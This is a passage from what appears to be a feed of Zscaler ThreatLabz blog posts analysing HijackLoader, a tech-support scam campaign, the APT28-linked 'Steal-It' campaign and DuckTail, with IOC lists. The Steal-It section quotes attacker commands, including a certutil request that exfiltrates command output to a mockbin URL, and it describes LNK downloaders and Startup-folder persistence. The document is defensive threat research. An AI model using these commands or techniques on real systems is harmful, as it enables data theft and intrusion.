enc_data[idx:idx+4])[0] ^ struct.unpack("<L", key[idx%200:idx%200 + 4])[0] dec.extend(dec_int.to_bytes((dec_int .bit_length() + 7) // 8, byteorder='little')) HijackLoader’s shellcode then proceeds with the injection or direct execution of the decrypted payload. The technique the shellcode uses depends on a number of different factors such as the payload’s file type and a flag, which is stored in the settings and indicates the injection method to use. In the table below, we describe each case along with a description of the action taken. Table 5 - HijackLoader Code Injection Methods INJECTION TYPE DESCRIPTION DLL file type. In the case of a DLL file type, the shellcode parses the PE file and leverages the ESLR module, which erases the shellcode data and executes directly the entry point of the DLL. Code injection when the injection flag is set to 3 and PE relocation is required (Method 1). Creates a process of the FIXED module and writes to disk a file, which includes various information such as: Pointer to the address of the rshell module data. Process and thread handles of the created process. Pointer to the address of the final payload. Then it executes the ESWR module, which injects the rshell module into the created process. As a result, the rshell module reads the written file and therefore the data of the final payload. After relocating and parsing the file, HijackLoader executes the final payload. Code injection when the injection flag is set to 3 and PE relocation is required (Method 2). Creates a process of the FIXED module, loads the tinystub module, and adds a new PE section to it. The patched stub module is written to the disk. It is important to note that HijackLoader writes the data without including the “MZ” string. Instead, it delays the execution for a few seconds and then writes to the file the MZ signature byte-by-byte. Finally, it proceeds with the execution of the final payload as described in the previous method. Code injection when the injection flag is set to 3 and no PE relocation is required (Method 1). The implementation is similar to the previous two cases. However, there are a few notable differences: HijackLoader adds a new section in the final payload file. This new section has the rshell module. In the case of a .NET file, HijackLoader creates an msbuild process instead of using the FIXED module. The code searches for certain values in the rshell module and replaces them with the same values that are used in the file, which is written to disk (i.e., egg-hunting). In order to evade detection by security products, it writes random data to the injected process. Code injection when the injection flag is set to 3 and no PE relocation is required (Method 2). Same code injection technique as with the previous case, but the data injection takes place with timing delays. Code injection when the injection flag is set to 3 with a .NET PE file. Creates an msbuild process, and injects the rshell module and the payload. Searches for certain values in the rshell module and replaces them to point to the address of the decrypted payload along with the injection type and the payload size. NOTE: No file is written on disk. Writes random data in the injected process. Code injection when the injection flag is set to 4. Creates an msbuild process and injects the rshell module and the payload. Searches for certain values in the rshell module and replaces them to point to the address of the decrypted payload along with the injection type and the payload size. NOTE: No file is written on disk. Writes random data in the injected process. Conclusion In summary, HijackLoader is a modular loader with evasion techniques, which provides a variety of loading options for malicious payloads. Moreover, it does not have any advanced features and the quality of the code is poor. However, considering the increasing popularity of HijackLoader, we expect code improvements and further usage from more threat actors, especially to fill the void left by Emotet and Qakbot. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Cloud Sandbox Zscaler’s multilayered cloud security platform detects indicators related to HijackLoader at various levels. Indicators of Compromise (IOCs) Host Indicators SHA256 Hash DESCRIPTION 7bd39678ac3452bf55359b44c5192b79412ce61a82cd72eef88f91aba5792ee6 HijackLoader 6b1621bded06b082f83c731319c9deb2fdf751a4cec1d1b2b00ab9e75f4c29ca HijackLoader e67790b394f5238908fcc326a9db940b200d9b50cbb45f0bfa94038db50beeae HijackLoader 693cace37b4b6fed2ca67906c7a4b1c11273110561a207a222aa4e62fb4a184a HijackLoader 04c0a4f3b5f787a0c9fa8f6d8ef19e01097185dd1f2ba40ae4bbbeca9c3a1c72 HijackLoader Network Indicators IOC DESCRIPTION hxxps://www.4sync[.]com/web/directDownload/KFtZys VO/4jBKM7R0.baa89a7b43a7b73227f22ae561718f7f Payload URL, which HijackLoader uses to load Danabot. hxxps://geupdate-service[.]bond/img/3344379399.png Payload URL, which HijackLoader uses to load RedLine stealer. References "Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers" by Natalie Zargarov Fri, 08 sep 2023 08:59:08 -0700 Nikolaos Pantazopoulos Rise in Tech-Support Scams Abusing Windows Action Center Notifications Introduction The Zscaler ThreatLabz team recently observed a surge in tech-support scams, with a noteworthy focus on the utilization of Windows Action Center notifications to display misleading warning messages to users. While the majority of tech-support scams previously centered around counterfeit notifications related to Windows Defender, scammers have since expanded their tactics to include bogus web pages impersonating other security providers like McAfee and Avast. Now, threat actors use pirated movie streaming websites and X (formerly Twitter) as conduits for directing users to fraudulent tech-support pages by using the Windows Action Center notifications to display fictitious warnings and alerts. In this blog, we examine two tech-support campaigns and the tactics they employ to trick users into willingly accepting fraudulent notifications that go on to display multiple fake infection-related warnings. Key Takeaways Delayed Gratification Over Instant Joy: We observed tech-support scammers focusing on using the Windows Action Center notifications to push notifications, instead of the traditional immediate appearance of pop-ups. Explicit Images as a Lure: Many tech-support scams post explicit images on social media platforms to solicit attention from potential victims. Pirated Streaming Websites as Initial Vector This campaign targets users visiting pirated movie streaming websites. When the user clicks Play to watch a video, they receive a pop-up asking them to allow or cancel notifications from the website in order to watch the video. If a user chooses to allow notifications, the website’s domain is added to the “allowed” notifications in the web browser. This grants the website permission to push notifications to the user’s systems even when they are not active on the website. In the screenshot below, we see websites that were added to the allowed list. On the right side of the screen, the Windows notifications slider displays the scam notifications pushed by the websites. Figure 1: Ad redirector/scam serving websites added to the notification allowed list of the browser. After a brief period of time, the user is bombarded with notifications with ad content, beginning with explicit advertisements followed by notifications saying their system is infected. When the user clicks on a notification, a new screen appears playing alarming MP3 audio convincing them that the system is infected. The same screen asks users to call the Windows Support phone number so a technician can help them resolve the problem. Of course, these messages are fraudulent and will direct users to a scam center. Figure 2: Tech-support scam page, which makes the page full-screen and disables keystrokes, effectively locking out users because they can’t minimize or close the page. The user can’t close the page, minimize it, or right-click on the page because the tech-support scam page runs a JavaScript code which disables these features. This is depicted in the screenshot below. Figure 3: Screenshot of JavaScript code disabling features. This campaign is unique because fraudulent messages do not immediately appear on the infected system when the user hits Play - which has been observed in traditional tech support scam chains. For this campaign, the threat actors want users to subscribe to the notification. After some time, the malicious redirects show up as a notification in the Windows Action Center. Most of the campaigns we analyzed were hosted on Amazon CloudFront or DigitalOcean. Many of the URL variants hosted on DigitalOcean begin with a marine animal name. Figure 4: URL patterns observed in this campaign. This tech-support scam campaign primarily targeted users from Australia, Canada, Japan, and the United States. Figure 5: Geographical targets of tech-support campaign. Signature Hits According to our monitoring, these signature hits indicate the number of daily users accessing tech-support scam websites. Figure 6: Hits for tech-support Campaign July-Aug 2023. X (formerly Twitter) as Initial Vector We also observed social media platforms like X (formerly Twitter) being used to redirect users to tech-support scam pages. This is mainly accomplished by using fake profiles to post alluring or sensational content to attract users' attention. In the screenshot below, you can see provocative images being posted from fake accounts. Figure 7: Fake profiles posting sensationalized images on X (formerly Twitter) Once a user clicks on the X (formerly Twitter) posts, they are redirected to a page where users are prompted to complete a fake “robot verification” process, which usually involves solving a captcha or interacting with checkboxes. This step is meant to create an illusion of authenticity. Figure 8: A page asking a user to allow notifications and prove they are not a robot Once the user solves the captcha and clicks to allow access, the website uses the permission to display unwanted notifications and bombard the user with frequent pop-ups using the Windows Action Center. These pop-ups claim that the user's device is compromised and requires a renewal of their antivirus subscription. This is depicted in the images below. Figure 9: Unwanted pop-up windows The objective of this campaign is usually to plant harmful or potentially malicious software. It is obvious that these pages are fake because they are not affiliated with any legitimate antivirus vendors. Figure 10: A fraudulent tech support webpage that generates false alerts of computer infections. Here are a few more examples where websites “detect” vulnerabilities in a user's system and warn them about potential virus infections if renewal is neglected. This is all a strategy to make the user panic and contact tech-support. Figure 11: A deceptive Avast-themed webpage falsely indicating that the user's system is vulnerable to virus infections. These sites may also offer discounts on renewal, which increases the likelihood of users making a purchase. This is shown in the screenshot below. Figure 12: A deceptive McAfee-themed webpage falsely indicating that the user's system is vulnerable to virus infections and offering a discount. Conclusion Tech-support scams are updating their tactics as cybercriminals exploit Windows Action Center notifications to deceive users. Our research sheds light this shift in tactics, emphasizing the importance of staying informed and cautious. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Detection & Indicators of Compromise (IOCs) Zscaler ThreatLabz Detection HTML.Phish.TechSupport Indicators of Compromise (IOCs) dzz27sptilkop[.]cloudfront[.]net/werrx01/?phone=+XXXXXXXXX& d2amlsdxhfbfr1[.]cloudfront[.]net/?number=+1-XXXXXXXXX sea-turtle-app-yb2h9[.]ondigitalocean[.]app/?number=XXXXXXXXX lobster-app-3vokw[.]ondigitalocean[.]app/?number=XXXXXXXXX orca-app-txfhl[.]ondigitalocean[.]app/?number=XXXXXXXXX squid-app-dcxll[.]ondigitalocean[.]app/?number=XXXXXXXXX starfish-app-klskk[.]ondigitalocean[.]app/?number=XXXXXXXXX oyster-app-2wnqh[.]ondigitalocean[.]app/?number=XXXXXXXXX Domains Present in X (formerly Twitter) Posts keewoach[.]net whulsaux[.]com naipsouz[.]net potsaglu[.]net vasteeds[.]net dolatiaschan[.]com oulsools[.]com soocaips[.]com zatloudredr[.]com almstda[.]tv zeekaihu[.]net nebsefte[.]net whoursie[.]com thaudray[.]com greewepi[.]net Newly Registered Streaming Sites worldsports1[.]live powerakkus[.]com trophional[.]com acc-network[.]us enake[.]site soccerloverss[.]online foreverstream[.]xyz zodic[.]xyz np-downloader[.]com squathweenic[.]com gemstreams[.]com Sites Asking User to Grant Permission sembilme[.]com bonalluterser[.]com exusnefte[.]com scotennepruse[.]com squathweenic[.]com birmentuorpose[.]co[.]in re-captha-version-3-23[.]top ologeysurincon[.]com Redirected Fake Security Product Pages yourtopdefencebulwark[.]site myalltimebestdefender[.]site sunfont[.]site keepsafetycenter[.]com worldwidedefence[.]online improvedwebsecurity[.]com webprotectionrequired[.]com highpotencyguard[.]com ultradesktopanalytic[.]com analysesecuritystatus[.]com datasecuritypc[.]com totaldeviceanalyticsoft[.]club X (formerly Twitter) Accounts Gracie Walker @GinaSloan30632 Amy Day @DayAmy95254 Haven Joyce@DejaSchmid1862 Audrey Mayer @MelissaGal14721 Thu, 07 sep 2023 09:29:44 -0700 Rohit Hegde Steal-It Campaign Introduction Zscaler ThreatLabz recently discovered a new stealing campaign dubbed as the "Steal-It" campaign. In this campaign, the threat actors steal and exfiltrate NTLMv2 hashes using customized versions of Nishang's Start-CaptureServer PowerShell script, executing various system commands, and exfiltrating the retrieved data via Mockbin APIs. Through an in-depth analysis of the malicious payloads, our team observed a geofencing strategy employed by the campaign, with specific focus on targeting regions including Australia, Poland, and Belgium. These operations use customized PowerShell scripts, designed to pilfer crucial NTLM hashes before transmitting it to the Mockbin platform. The initial phase of the campaign involves the deployment of LNK files concealed in zip archives, while ensuring persistence within the system through strategic utilization of the StartUp folder. Additionally, the gathered system information and NTMLv2 hashes are exfiltrated using Mockbin APIs. We believe the Steal-It campaign may be attributed to APT28 (aka Fancy Bear) based on its similarities with the APT28 cyber attack reported by CERT-UA in the Threat Actor Attribution section. Key Takeaways - Exfiltration Tactics: We discovered that the threat actor steals and exfiltrates NTLM hashes using customized scripts from the Nishang framework and system information by executing system commands. Once captured, the data is exfiltrated via mock APIs. - Explicit Images as Lures: The Fansly Whoami Exfil and Exfil Sysinfo OnlyFans infection chain variations use explicit images of models to entice victims to execute the initial payload. - Geofencing and Targeted Regions: Threat actors use a geofencing strategy with specific focus on targeting regions including Australia, Poland, and Belgium. - Mockbin as a Service: We observed the use of Mockbin, an API endpoint generating tool, and mock APIs to transfer stolen data such as NTLM hashes and command output. Campaign Analysis After analyzing multiple samples for the Steal-It campaign, we categorized the infection chains based on the variations observed in the TTPs. The sections below depict these infection chains. NTLMv2 Hash Stealing Infection Chain How it works Figure 1: NTLMv2 hash stealing infection chain flow Overview The NTLMv2 hash stealing infection chain steals NTLMv2 hashes by utilizing a customized version of Nishang’s Start-CaptureServer PowerShell script and transmitting the stolen hashes via mocky API’s to Mockbin. Technical Analysis The infection chain begins with a ZIP archive bundled with a malicious LNK (shortcut) file, the LNK file is commissioned to download and execute another PowerShell script from mockbin[.]org and webhook[.]site as seen in the screenshot below. Figure 2: Initial LNK File downloading & executing a customized Nishang’s Start-CaptureServer PowerShell script The PowerShell Script executed by the malicious LNK file is a customized version of Nishang’s Start-CaptureServer.ps1 script that is especially developed to capture NTLMv2 hashes. The threat actors modified Start-CaptureServer.ps1 by removing: comments detectable strings ito evade static detections basic authentication method for capturing credentials The most significant modification our team observed was that the captured base64-encoded NTLMv2 hashes are exfiltrated by calling the Net.WebClient.DownloadString() function with the URL: https[:]//<id>”as an argument. This is depicted in the screenshot below. Figure 3: A customized version of Nishang’s Start-CaptureServer PowerShell script Once the DownloadString() function is executed, it performs a GET request to the specified URL. Mockbin enables you to create custom endpoints for testing, mocking, and monitoring HTTP requests and responses across different libraries, sockets, and APIs. When the GET request is made to the Mockbin URL with a captured base64-encoded NTMLv2 hash, the request is logged on the server side and can be tracked by threat actors. SystemInfo Stealing Infection Chain How it works Figure 4: Systeminfo stealing infection chain flow Overview The Systeminfo stealing infection chain uses the OnlyFans brand to entice users into downloading the later stages of the chain, which exfiltrate command outputs to Mockbin. Technical Analysis This infection chain starts with a ZIP archive named “” bundled with a malicious LNK (shortcut) file called Upon execution, the malicious LNK file runs a command that opens the Microsoft Edge browser with a base64 encoded argument. This argument is a JavaScript one liner redirecting to the http://run[.]mocky[.]io/v3/<id> URL using location.href. This is depicted in the screenshot below. Figure 5: Initial LNK file - OnlyFans To conceal the malicious redirection, the command also opens the legitimate OnlyFans website in another tab and pauses execution for 9 seconds. Now the opened run[.]mocky[.]io URL is a HTML page with malicious JavaScript code that performs the following actions: Verifies if the userAgent header includes the keyword "win" to determine if the operating system being used is Windows. Utilizes the IPAPI Geolocation API to check if the country code is "AU" (Australia). Specifically looking for the “AU” country code indicates the infection chain is geofenced and targeting users from Australia. If the user’s operating system is Windows and they are located in Australia, the code proceeds to download another malicious LNK file named m8. This file is created by decoding a base64-encoded blob of data, as illustrated in the screenshot below. Figure 6: Run[.]Mocky[.]io HTML page geofenced to target users from Australia Furthermore, the downloaded LNK file is copied to the Startup folder as specified in the argument of the previous LNK file: move /y %userprofile%\Downloads\m8 m8.lnk. Since the working directory of the previous LNK file is set to the Startup folder path, the LNK file is copied into the Startup folder. Because of this, the m8.lnk file will be executed every time the system is restarted, allowing persistence on the system. When executed, the downloaded LNK file m8.lnk downloads a CMD file from run[.]mocky[.]io and copies it to the Startup folder as m8.cmd, following the same method as the previous LNK file. These actions are depicted in the screenshot below. Figure 7: LNK file downloading the final script The CMD file m8.cmd is executed on a system reboot, and is the final script commissioned to gather and exfiltrate the system information. Once executed, it first runs the following three system commands and stores the output in the ProgramData directory. ipconfig systeminfo tasklist From here, the script base64 encodes the command output files using CertUtil and sets environment variables for the base64-encoded command outputs using set /p ipc=<%programdata%\<b64enc_cmdoutput>. The newly set environment variables are exfiltrated by performing a GET request to the mockbin[.]org using certutil -urlcache -f <http[:]//mockbin[.]org/bin/<id>/%env_var%. The environment variables are passed on in the request as shown in the screenshot. Figure 8: Final script - Execute system commands and exfiltrate output to Towards the end of the script, clean up takes place where the command output files are deleted and the command outputs of executed commands: ipconfig, systeminfo, tasklist are exfiltrated to Mockbin URL. Fansly Whoami Exfil Infection Chain How it works Figure 9: Fansly whoami exfil infection chain flow Overview The Fansly whoami exfil infection chain uses the Fansly brand to entice users into downloading the later stages of the chain, which exfiltrate command outputs to Mockbin. Technical Analysis This infection chain begins with a ZIP archive bundled with a malicious LNK (shortcut) file. The LNK file opens the http://run[.]mocky[.]io/v3/<id> URL in a browser, which consists of an HTML page with malicious Javascript. This HTML page is different from the page described in the "Systeminfo stealing infection chain" section. In this case, the JavaScript performs the following actions: Verifies if the userAgent header includes the keyword "win" to determine if the operating system being used is Windows. Utilizes the IPAPI Geolocation API to check if the country code is "PL" (Poland). Verifies whether the IP address version is "ipv4" Specifically looking for the “PL” country code indicates the infection chain is geofenced and targeting users from Poland. If all of the conditions above are satisfied, the JavaScript downloads a ZIP file named by decoding a large base64 blob. The ZIP file includes three explicit JPEG images of Ukrainian and Russian Fansly models to lure users into downloading a malicious batch file, called fansly.com_online.bat, bundled inside the same ZIP archive. Figure 10: Explicit images of Ukrainian & Russian Fansly models used to entice users into downloading a hidden file Once executed, the fansly.com_online.cmd batch script performs the following actions: Writes a VBScript & a batch script in the ProgramData directory and executes the VBscript. The VBScript opens real Fansly model profiles to conceal the malicious actions and then executes the batch script written in the ProgramData directory. Once executed, the batch script: kills any running msedge.exe process deletes any .css files in the downloads folder opens a mockbin[.]org URL which downloads a eucv8o.css file into the Downloads folder moves eucv8o.css into the ProgramData directory as eucv8o.cmd and then executes When the mockbin[.]org URL is opened by the batch script in an Microsoft Edge browser, the JavaScript performs the following actions: Verifies if the userAgent header includes the keyword "win" to determine if the operating system being used is Windows. Ensures that userAgent does not contain the string “wow” which indicates that the 32-bit process is running in a 64-bit Windows machine. Checks if the browser version (Chrome/Firefox”UserAgent - Microsoft Edge also uses Chrome) is greater than "100". If all conditions above are satisfied, the JavaScript redirects to another mockbin[.]org URL which executes another JavaScript code that performs the following actions: Verifies if the userAgent header includes the string “edg” to determine if the Microsoft Edge browser is being used. Leverages the IPAPI Geolocation API to check if the country code is "PL" (Poland) If all the conditions above are met, a eucv8o.css file is downloaded by decoding a base64 blob in the Downloads folder. As mentioned above, eucv8o.css is moved into the ProgramData directory as eucv8o.cmd and then executed: kills the msedge.exe process executes “whoami” command and stores the output in the ProgramData directory sets the environment variable dobpyk to the output of the whoami command exfiltrates the output of the WHOAMI command to the mockbin[.]org URL by sending a GET request with the appended command output, like this: mockbin[.]org/bin/<id>/<cmd_output> deletes the command output file and the downloaded .css file The execution flow is depicted in the screenshot below: Figure 11: Execute whoami and exfiltrate the output to Windows Update Exfil Infection Chain How it worksFigure 12: Windows update exfil infection chain flow Overview In our analysis of this infection chain, we observed a ZIP archive bundled with a LNK file that uses geofencing techniques to target users in Belgium and unknowingly downloading multiple stages of a PowerShell script that executes system commands to collect basic information for nefarious purposes. Interestingly, we saw a similar infection reported by CERT-UA which was attributed to APT28. Technical Analysis For this infection chain, the initial vector is a malicious LNK file bundled inside a ZIP archive (e.g. The malicious LNK file opens the run[.]mocky[.]io URL using Microsoft Edge. This downloads a c1 file into the Downloads folder, which is then moved into the Startup folder as c1.bat, maintaining persistence on the machine. Whenever the system is restarted, c1.bat is executed. Figure 13: Initial LNK file Once opened, the run[.]mocky[.]io URL executes a JavaScript code which downloads a batch script from a base64-encoded blob. The batch script is downloaded to the Downloads folder, where it is then renamed to c1.bat and moved into the Startup folder. c1.bat includes the “Window Update” title (identical to the phishing email subject) and is primed to download another script from run[.]mocky[.]io into the ProgramData directory using CertUtil. To conceal the malicious activity, the batch script shows an seemingly innocuous message on the console with a progress bar. The message reads: “Dynamic Update for Windows Systems (KB5021043)” This is depicted in the image below. Figure 14: Fake Windows update BAT script execution to download the additional stages The LNK file opens a run[.]mocky[.]io URL using Microsoft Edge, which then performs following actions: Verifies if the userAgent header includes the keyword "edg" to determine if the browser used is “Microsoft Edge” Utilizes the IPAPI Geolocation API to check if the country code is "BE" (Belgium) Specifically looking for the “BE” country code indicates the infection chain is geofenced and targeting users from Belgium. Figure 15: Geofenced HTML that target users from Belgium If both the conditions above are satisfied, a b4.css script is downloaded into the Downloads folder by decoding a base64 blob. The script is then moved into the Startup folder and renamed to b4.cmd. This helps threat actors maintain persistence like in the other infection chains. Upon execution, b4.cmd opens another run[.]mocky[.]io URL using Microsoft Edge, which is similar to the JavaScript code seen in Figure 15. The JavaScript code executes the batch script with the title “Window Update” and displays a an innocent message on the console with a progress bar stating: “Dynamic Update for Windows Systems (KB5021043)” From here, another script is downloaded from run[.]mocky[.]io in the ProgramData directory using CertUtil to execute it. During the analysis, the Mocky URL was inaccessible, therefore while searching for similar scripts with the “Window Update” messages as shown in Figure 14, we discovered a PowerShell script which executes a final set of PowerShell commands downloaded from run[.]mocky[.]io. This script also uses the window title as “Updating Windows” and the message “Dynamic Cumulative Update for Windows (KB5023696)” to conceal malicious intentions as depicted in the screenshot below and was also reported previously. Figure 16: Fake Windows update PowerShell script executes system commands and exfiltrates output The final set of PowerShell commands in this script are commissioned to execute the commands tasklist and systeminfo on the system, and then use WebClient.UploadString() to exfiltrate the command output to the mockbin[.]org URL using a POST request as shown below. In addition to system information, we also observed cases where the full file paths were exfiltrated to mockbin[.]org by executing the “Get-ChildItem -Path <path> -Recurse -File | select FullName” command and then exfiltrate the command output using WebClient.UploadString(). Threat Actor Attribution Our team believes that the Steal-It campaign could be attributed to APT28, Russian cyber espionage group with medium confidence level. The similarities between our observations of these four infection chains discussed in the Steal-It Campaign and the APT28 cyber attack reported by CERT-UA (Computer Emergency Response Team of Ukraine) are striking. The Steal-It Campaign and the CERT-UA’s report shared the following: Similar PowerShell scripts for exfiltrating system information and the downloading of further stages with varied infection chain. Similar Mockbin URLs in payloads and abusing Mockbin API’s for hosting scripts and exfiltration of information. Similar TTPs such as gathering system information by executing commands and exfiltration of data using Mockbin APIs Similar “Windows Update” theme. Conclusion Zscaler ThreatLabz’s analysis of the Stealing campaign named as “The Steal-It Campaign” indicates their targeted geofencing strategy and sophisticated tactics. For example, the threat actors' custom PowerShell scripts and strategic use of LNK files within zip archives highlights their technical expertise. The persistence maintained by moving files from the Downloads to Startup folder and renaming them underscores the Threat Actors dedication to prolonged access. The meticulousness and technical process demonstrated by the Steal-It campaign emphasizes the importance of robust cybersecurity measures. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Zscaler Sandbox Coverage Zscaler's multilayered cloud security platform detects indicators at various levels. During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshot provided below. This comprehensive approach empowers cybersecurity professionals with critical insights into the malware's behavior, enabling them to effectively detect and counter the threats posed by the Threat Actors. The image below shows the Zscaler cloud sandbox report for LNK Files attributed to APT28 (LNK.Downloader.APT28). Figure 17: Zscaler sandbox detection In addition to sandbox detection, Zscaler’s multilayered cloud security platform detects indicators at various levels. LNK.Downloader.APT28 MITRE ATT&CK TTP Mapping ID TECHNIQUE NAME T1598 Phishing T1059 Command and Scripting Interpreter T1212 Exploitation for Credential Access T1567 Exfiltration Over Web Service T1037 Startup Items Indicators of Compromise (IoCs) NTLMv2 Hash Stealing LNK 022d01e7007971f5a5096c4f2f2b2aa4 1e2a320658ba5b616eae7a3e247f44a6 Customized Nishang Start-CaptureServer PowerShell script URL: mockbin[.]org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e URL: https[:]//webhook[.]site/33128548-0eda-4e2b-bf89-7b1b225ecb9f Script: 358d9271b8e207e82dafe6ea67c1d198 SystemInfo Stealing LNK 4083396ab0344c4731a30d4931bb1963 URL http[:]//run[.]mocky[.]io/v3/cee6d18e-5adb-4fbd-b47b-989768473c66 http[:]//run[.]mocky[.]io/v3/99c677eb-21e1-4064-9ab4-9ee9dfd2ef13 Fansly Whoami Exfil URL https[:]// https[:]// Windows Update Exfil LNK 02af0a334507fcdf7b374dff90eddead 468afeebde1c65b96e6d10e11428598e c95eed189823c9a2c7206d13ff953bdf URL http[:]//run[.]mocky[.]io/v3/2e757b51-c023-4bb6-9d3f-68489571abd7 https[:]//run[.]mocky[.]io/v3/e0687bb8-d14b-4ee0-8c47-202c5aaab48c http[:]//run[.]mocky[.]io/v3/ef2c9f34-11f5-4a99-b31c-6b203b5d5313 Wed, 06 sep 2023 08:15:29 -0700 Niraj Shivtarkar A Look Into DuckTail Introduction In our persistent quest to decode DuckTail’s maneuvers, Zscaler ThreatLabz began an intelligence collection operation in May 2023. Through an intensive three-month period of monitoring, we obtained critical details about DuckTail’s operational framework. This expedition granted us unprecedented visibility into DuckTail’s end-to-end operations, spanning the entire kill chain from reconnaissance to post-compromise. Our team yielded valuable insights into DuckTail’s intrusion techniques, compromise tactics, post-compromise procedures, and the underground economy. These insights, some of which have never been publicly documented, provide a panoramic view of their targets and an understanding of their strategic motives. This report dives into the operational mechanics of DuckTail, dissecting the anatomy of their tactics, techniques and procedures (TTPs), and tracing the trajectory of stolen data. Key Takeaways Ideal Social Engineering Target: DuckTail threat actors primarily target users working in the digital marketing and advertising space. Unfortunately, the tech layoffs occurring in 2022 and 2023 introduced more eager candidates into the digital market - meaning more prime targets for DuckTail. Raiding Business and Ad Accounts: DuckTail targets Facebook and TikTok business accounts, and Google ad accounts. Stolen social media business accounts feed an underground economy where these accounts are traded among other users in Vietnamese Telegram groups. Social Engineering as the Distribution Method: DuckTail’s primary distribution vector continues to be social engineering through LinkedIn messaging. Threat actors set up fake LinkedIn recruiter profiles and fake job postings impersonating popular companies to lure unsuspecting victims looking for employment. Expanding and Always Evolving: DuckTail continues to expand the list of cloud services abused for hosting and distributing payloads. Exploiting Themes of Innovative AI Online Tools: DuckTail threat actors have successfully weaponized the recent popularity of generative AI platforms, such as ChatGPT and Google Bard AI, to lure victims to install malicious software. Stealthy and Strategic Maneuvers: DuckTail threat actors use private residential proxy services to log in to compromised social media business accounts to prevent raising any security alarms. In addition, they abuse the "Encrypted notifications" Facebook feature to prevent the victim from performing an account recovery. Brief Overview DuckTail is an operation that involves multiple Vietnam-based threat actors who share the same tactics, techniques, and procedures (TTPs). They also share the same motivation: gain access to social media business accounts, specifically ones belonging to digital marketers. DuckTail malware steals saved session cookies from browsers, with code specifically tailored to take over Facebook business accounts.The malware is typically spread on LinkedIn, where threat actors post fake job descriptions to “recruit” potential victims. The “products” of the operation (i.e. hacked social media accounts) feed an underground economy of stolen social media accounts, where numerous vendors offer accounts priced according to their perceived usefulness for malicious activity. The image below shows a high-level overview of how DuckTail threat actors abuse different cloud services and social media platforms in their whole operation: Figure 1: Visual overview illustrating how DuckTail abuses social media and cloud platforms in different stages of their operation. Unveiling DuckTail’s TTPs Overview of the architecture The threat research community is already abundant with great articles that address the technical details of DuckTail’s malware payload. Distribution methods and techniques The following sections break down: the infection vectors employed by Ducktail what those infection campaigns look like Fake Job Posts on LinkedIn DuckTail primarily reaches victims by posting fake marketing-related job listings on LinkedIn. The threat actors presume that the marketing professionals who apply likely have access to ad accounts. The image below is an example of a fake job post on LinkedIn used by Ducktail to lure an unsuspecting candidate. Figure 2: This is what the threat actor sees moments after setting up a fake marketing job post on LinkedIn. It’s worth noting that the post is promoted. In addition to creating fake job posts on LinkedIn, threat actors also set up profiles on LinkedIn impersonating recruiters. To facilitate social engineering tactics, in some cases, threat actors add the “Hiring” banner to their LinkedIn profile picture. This catches the attention of users actively seeking a new job. Once a potential victim responds to a bait post, the “recruiter” will send a message on LinkedIn. How it works The threat actors will ask the interested applicant to review the job application package by: Downloading an archive Opening it on a Windows machine Double-clicking the executable (camouflaged as another type of file) inside it To maximize their chance of infection, some threat actors create instructional videos showing victims how to “properly” infect their own devices. The image below shows this tactic in action: Figure 3: “Ashley Swarts” (a fake threat actor account) instructing a victim on how to open the fake job application package. The nuances of language The threat actor’s English proficiency closely matches the English language skills of an average Vietnamese cybercriminal, not an American HR professional. Our team observed threat actors using Google Translate to communicate with potential victims. The image below shows a threat actor translating messages from English to Vietnamese in real-time as they communicate with a victim. The predominant use of the Vietnamese language also supports our attributing DuckTail to Vietnamese threat actors. Figure 4: A threat actor using Google Translate to communicate in English while handling multiple fraudulent job application conversations on LinkedIn. Impersonating real companies DuckTail threat actors send job offers impersonating popular organizations and brands to entice job seekers. In the image below, a threat actor leveraged a compromised LinkedIn account to message a victim with job opportunity details. While impersonating a real company called Mondelez International, this threat actor sent the following in their message: a link to the company's real Wikipedia and Facebook page an iCloud URL hosting an archive file containing the malware Figure 5: A threat actor messaging a victim on LinkedIn and impersonating a real company. Spear phishing emails Our team also observed cases where threat actors sent infected archive links through email, after making initial contact on LinkedIn. The image below shows a spear phishing email example. Figure 6: A spear phishing email sent to a victim containing the URL shortener link, which downloads the malicious archive file. .NET executables as a common thread in DuckTail binaries Most commonly, DuckTail’s malware payload is a .NET executable, but this is not always the case. Some Ducktail payloads come in an Excel add-in or browser extension. The .NET executables family associated with the Ducktail variants share the following attributes: Large file sizes, in most cases - around 70 MB or more Includes a fake Office or PDF document icon Contains a decoy document with details about the fake job offer/marketing advertisement, which opens right after execution Signed with valid code-signing certificates belonging to Vietnamese publishers (sometimes) Makes use of Telegram for C2 communications The executable is usually delivered in an archive, together with image and video files. The images below depict two common archive variations. Type 1 Archive Figure 7: Type 1 Archive - .exe files with fake icons (first row), together with job-related images Type 2 Archive Figure 8: Type 2 Archive - .lnk files with PowerShell payloads, plus .scr executables, both obscured by double extensions (.pdf.lnk, .docx.scr), together with job-related images Cloud hosting and URL shortening services Our research team noticed the following patterns when investigating DuckTail’s infrastructure: Malicious archives are often hosted on public cloud hosting services like iCloud, Google Drive, Dropbox,, and OneDrive. In some cases, threat actors use Trello, a project management platform, as a cloud hosting service by uploading archives as attachments to Trello cards and providing victims with a direct download link to the card. Another widely abused platform is Rebrandly ( - a URL shortener service. Threat actors spread download links generated by Rebrandly to give the download a more legitimate look. You can see the difference that Rebrandly makes in the image below. Figure 9: A redirection chain set up by the threat actor transforms a long, unfriendly Dropbox link into a short link. Newly registered domains used to host payloads In addition to disguising links with Rebrandly, threat actors also registered many custom domains through Rebrandly, spreading shortened links with their own fake company name domains. Most of these custom domains registered by the threat actor use TLDs like: .social .software .sale .click .news .agency .company For a complete list of newly registered domains used by DuckTail, visit the Indicators of Compromise (IOCs) section at the bottom of this blog. Marketing guides and AI tools Another method of infection is the creation of web pages pretending to offer marketing guides and marketing software, but actually serving DuckTail malware. We observed the following legitimate marketing and AI tools spoofed: Adplexity ClickMinded ChatGPT Google BardAI Generative AI softwares, like ChatGPT, are prime targets because they are being increasingly utilized by professionals working in digital marketing, content creation, and advertising. The image below shows a web page created by a threat actor leveraging ChatGPT for Facebook advertising. Figure 10: A screenshot of newguide[.]tech, a website set up by Ducktail to leverage ChatGPT. Below, there is another example of a website set up by a threat actor impersonating Adplexity. Figure 11: A screenshot of adplexitydesk[.]tech, a website set up by Ducktail 